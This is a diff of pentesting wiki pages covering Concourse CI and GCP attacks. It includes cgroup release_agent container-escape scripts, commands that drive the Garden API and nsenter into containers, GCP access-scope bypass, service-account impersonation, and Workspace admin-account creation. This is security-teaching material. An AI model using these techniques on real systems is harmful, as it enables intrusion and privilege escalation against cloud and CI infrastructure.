If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using: If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
@ -160,7 +158,7 @@ With these permissions you might be able to:
* Try to **escape** to the node * Try to **escape** to the node
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) * Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
### Pipeline Creation/Modification ## Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
@ -195,7 +193,7 @@ With the **modification/creation** of a new pipeline you will be able to:
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) * Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
* **Delete** created pipeline * **Delete** created pipeline
### Execute Custom Task ## Execute Custom Task
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
@ -221,7 +219,7 @@ params:
fly -t tutorial execute --privileged --config task_config.yml fly -t tutorial execute --privileged --config task_config.yml
``` ```
### Escaping to the node from privileged task ## Escaping to the node from privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
@ -241,20 +239,20 @@ echo 1 > /tmp/cgrp/x/notify_on_release
# The host path will look like the following, but you need to change it: # The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs" host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command: # The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
#/dev/vda1 on /scratch type ext4 (rw,relatime) #/dev/vda1 on /scratch type ext4 (rw,relatime)
#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime) #/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
#/dev/vda1 on /etc/hosts type ext4 (rw,relatime) #/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime) #/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)
## Then next part I think is constant "hostpath-provisioner/default/" # Then next part I think is constant "hostpath-provisioner/default/"
## For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed # For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
# "concourse-work-dir" is constant # "concourse-work-dir" is constant
# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API) # "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)
# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number) # "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant # The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like: # running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028 # workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
# the UID is the part we are looking for # the UID is the part we are looking for
@ -289,7 +287,7 @@ cat /output
As you might have noticed this is just a [**regular release\_agent escape**](../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged) just modifying the path of the cmd in the node As you might have noticed this is just a [**regular release\_agent escape**](../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged) just modifying the path of the cmd in the node
{% endhint %} {% endhint %}
### Escaping to the node from a Worker container ## Escaping to the node from a Worker container
A regular release\_agent escape with a minor modification is enough for this: A regular release\_agent escape with a minor modification is enough for this:
@ -320,7 +318,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output cat /output
``` ```
### Escaping to the node from the Web container ## Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
@ -360,7 +358,7 @@ select * from teams; #Change the permissions of the users in the teams
select * from users; select * from users;
``` ```
### Abusing Garden Service - Not a real Attack ## Abusing Garden Service - Not a real Attack
{% hint style="warning" %} {% hint style="warning" %}
This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
@ -392,7 +390,7 @@ In the previous section we saw how to escape from a privileged container, so if
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
#### Getting inside a running privileged container ### Getting inside a running privileged container
```bash ```bash
# Get current container # Get current container
@ -404,7 +402,7 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container # Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 # In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \ --header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
@ -413,7 +411,7 @@ wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
``` ```
#### Creating a new privileged container ### Creating a new privileged container
You can very easily create a new container (just run a random UID) and execute something on it: You can very easily create a new container (just run a random UID) and execute something on it:

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Concourse Lab Creation # Testing Environment
## Testing Environment ## Running Concourse
### Running Concourse ### With Docker-Compose
#### With Docker-Compose
This docker-compose file simplifies the installation to do some tests with concourse: This docker-compose file simplifies the installation to do some tests with concourse:
@ -34,7 +32,7 @@ docker-compose up -d
You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
#### With Kubernetes (Recommended) ### With Kubernetes (Recommended)
You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
@ -90,11 +88,11 @@ data:
' | kubectl apply -f - ' | kubectl apply -f -
``` ```
### Create Pipeline ## Create Pipeline
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
### Steps ## Steps
Several different type of steps can be used: Several different type of steps can be used:
@ -112,7 +110,7 @@ Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concour
Therefore, it's possible to indicate the type of container each step needs to be run in. Therefore, it's possible to indicate the type of container each step needs to be run in.
### Simple Pipeline Example ## Simple Pipeline Example
```yaml ```yaml
jobs: jobs:
@ -150,11 +148,11 @@ fly -t tutorial intercept --job pipe-name/simple
Check **127.0.0.1:8080** to see the pipeline flow. Check **127.0.0.1:8080** to see the pipeline flow.
### Bash script with output/input pipeline ## Bash script with output/input pipeline
It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
### Triggers ## Triggers
You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP Security # Security concepts <a href="#security-concepts" id="security-concepts"></a>
## Security concepts <a href="#security-concepts" id="security-concepts"></a> ## **Resource hierarchy**
### **Resource hierarchy**
Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions. Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
@ -36,7 +34,7 @@ Organization
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc. A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
### **IAM Roles** ## **IAM Roles**
There are **three types** of roles in IAM: There are **three types** of roles in IAM:
@ -50,7 +48,7 @@ There are thousands of permissions in GCP. In order to check if a role has a per
**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.** **You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
#### Basic roles ### Basic roles
| Name | Title | Permissions | | Name | Title | Permissions |
| ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@ -85,11 +83,11 @@ Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.g
gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE] gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
``` ```
### **Organization Policies** ## **Organization Policies**
The IAM policies indicates the permissions principals has over resources via roles which ara assigned granular permissions. Organization policies **restrict how those service can be used or which features are enabled disabled**. This helps in order to improve the least privilege of each resource in the gcp environment. The IAM policies indicates the permissions principals has over resources via roles which ara assigned granular permissions. Organization policies **restrict how those service can be used or which features are enabled disabled**. This helps in order to improve the least privilege of each resource in the gcp environment.
### **Terraform IAM Policies, Bindings and Memberships** ## **Terraform IAM Policies, Bindings and Memberships**
As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource: As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
@ -97,7 +95,7 @@ As defined by terraform in [https://registry.terraform.io/providers/hashicorp/go
* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isnt binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**. * **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isnt binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role). * **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
### **Service accounts** ## **Service accounts**
Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you: Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
@ -120,7 +118,7 @@ SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog. If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.
### **Access scopes** ## **Access scopes**
The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**. The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
@ -159,7 +157,7 @@ This `cloud-platform` scope is what we are really hoping for, as it will allow u
It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance. It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
### Default credentials <a href="#default-credentials" id="default-credentials"></a> ## Default credentials <a href="#default-credentials" id="default-credentials"></a>
**Default service account token** **Default service account token**
@ -194,7 +192,7 @@ When using one of Google's official GCP client libraries, the code will automati
Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens. Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens.
### **Networking** ## **Networking**
Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound. Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound.
@ -247,16 +245,16 @@ We've automated this completely using [this python script](https://gitlab.com/gi
* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0) * nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0) * masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
## Enumeration # Enumeration
### Automatic Tools ## Automatic Tools
* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:) Bash script to enumerate a GCP environment using gcloud cli and saving the results in * [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:) Bash script to enumerate a GCP environment using gcloud cli and saving the results in
* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldnt make run the enumerate script) * [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldnt make run the enumerate script)
* [https://github.com/lyft/cartography:](https://github.com/lyft/cartography:) Tool to enumerate and print in a graph resources and relations of different cloud platforms * [https://github.com/lyft/cartography:](https://github.com/lyft/cartography:) Tool to enumerate and print in a graph resources and relations of different cloud platforms
* [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec:) This is a list of cloud security tools * [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec:) This is a list of cloud security tools
### IAM ## IAM
| Description | Command | | Description | Command |
| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | | ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ |
@ -272,26 +270,26 @@ We've automated this completely using [this python script](https://gitlab.com/gi
| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` | | List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` |
| List **service accounts** | `gcloud iam service-accounts list` | | List **service accounts** | `gcloud iam service-accounts list` |
## Unauthenticated Attacks # Unauthenticated Attacks
{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %} {% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %}
[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md) [gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %} {% endcontent-ref %}
#### Phishing ### Phishing
You could **OAuth phish** a user with high privileges. You could **OAuth phish** a user with high privileges.
#### Dorks ### Dorks
* **Github**: auth\_provider\_x509\_cert\_url extension:json * **Github**: auth\_provider\_x509\_cert\_url extension:json
## Generic GCP Security Checklists # Generic GCP Security Checklists
* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/) * [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference) * [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference)
## Local Privilege Escalation / SSH Pivoting # Local Privilege Escalation / SSH Pivoting
Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**: Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**:
@ -301,9 +299,9 @@ Supposing that you have compromised a VM in GCP, there are some **GCP privileges
If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440). If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).
## GCP Post Exploitation <a href="#cloud-privilege-escalation" id="cloud-privilege-escalation"></a> # GCP Post Exploitation <a href="#cloud-privilege-escalation" id="cloud-privilege-escalation"></a>
### GCP Interesting Permissions <a href="#organization-level-iam-permissions" id="organization-level-iam-permissions"></a> ## GCP Interesting Permissions <a href="#organization-level-iam-permissions" id="organization-level-iam-permissions"></a>
The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges. The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
@ -313,7 +311,7 @@ Moreover, during this enumeration, remember that **permissions can be set at the
[gcp-interesting-permissions](gcp-interesting-permissions/) [gcp-interesting-permissions](gcp-interesting-permissions/)
{% endcontent-ref %} {% endcontent-ref %}
### Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a> ## Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a>
When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
@ -387,7 +385,7 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions. You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
### Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a> ## Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
Impersonating a service account can be very useful to **obtain new and better privileges**. Impersonating a service account can be very useful to **obtain new and better privileges**.
@ -397,7 +395,7 @@ There are three ways in which you can [impersonate another service account](http
* Authorization **using Cloud IAM policies** (covered [here](broken-reference/)) * Authorization **using Cloud IAM policies** (covered [here](broken-reference/))
* **Deploying jobs on GCP services** (more applicable to the compromise of a user account) * **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a> ## Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
@ -413,7 +411,7 @@ If you succeeded here, try **accessing the web interface** and exploring from th
This is the **highest level you can assign using the gcloud tool**. This is the **highest level you can assign using the gcloud tool**.
### Spreading to Workspace via domain-wide delegation of authority <a href="#spreading-to-g-suite-via-domain-wide-delegation-of-authority" id="spreading-to-g-suite-via-domain-wide-delegation-of-authority"></a> ## Spreading to Workspace via domain-wide delegation of authority <a href="#spreading-to-g-suite-via-domain-wide-delegation-of-authority" id="spreading-to-g-suite-via-domain-wide-delegation-of-authority"></a>
[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. [**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
@ -425,7 +423,7 @@ However, it's possible to **give** a service account **permissions** over a Work
To create this relation it's needed to **enable it in GCP and also in Workforce**. To create this relation it's needed to **enable it in GCP and also in Workforce**.
#### Test Workspace access ### Test Workspace access
To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled. To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
@ -458,7 +456,7 @@ You can try this script across a range of email addresses to impersonate **vario
If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild. If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.
### Looting ## Looting
Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services: Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services:
@ -496,13 +494,13 @@ There is a gcloud API endpoint that aims to **list all the resources the accessi
[gcp-looting.md](gcp-looting.md) [gcp-looting.md](gcp-looting.md)
{% endcontent-ref %} {% endcontent-ref %}
### Persistance ## Persistance
{% content-ref url="gcp-persistance.md" %} {% content-ref url="gcp-persistance.md" %}
[gcp-persistance.md](gcp-persistance.md) [gcp-persistance.md](gcp-persistance.md)
{% endcontent-ref %} {% endcontent-ref %}
## Capture gcloud, gsutil... network # Capture gcloud, gsutil... network
```bash ```bash
gcloud config set proxy/address 127.0.0.1 gcloud config set proxy/address 127.0.0.1
@ -521,7 +519,7 @@ gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file gcloud config unset core/custom_ca_certs_file
``` ```
## References # References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) * [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)

View file

@ -16,22 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
### Public Assets Discovery # Public Assets Discovery
One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**. Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
### Public Resources Brute-Force # Public Resources Brute-Force
#### Buckets, Firebase, Apps & Cloud Functions ## Buckets, Firebase, Apps & Cloud Functions
* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions * [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps. * [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
#### Buckets ## Buckets
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
@ -41,11 +40,11 @@ The following tools can be used to generate variations of the name given and sea
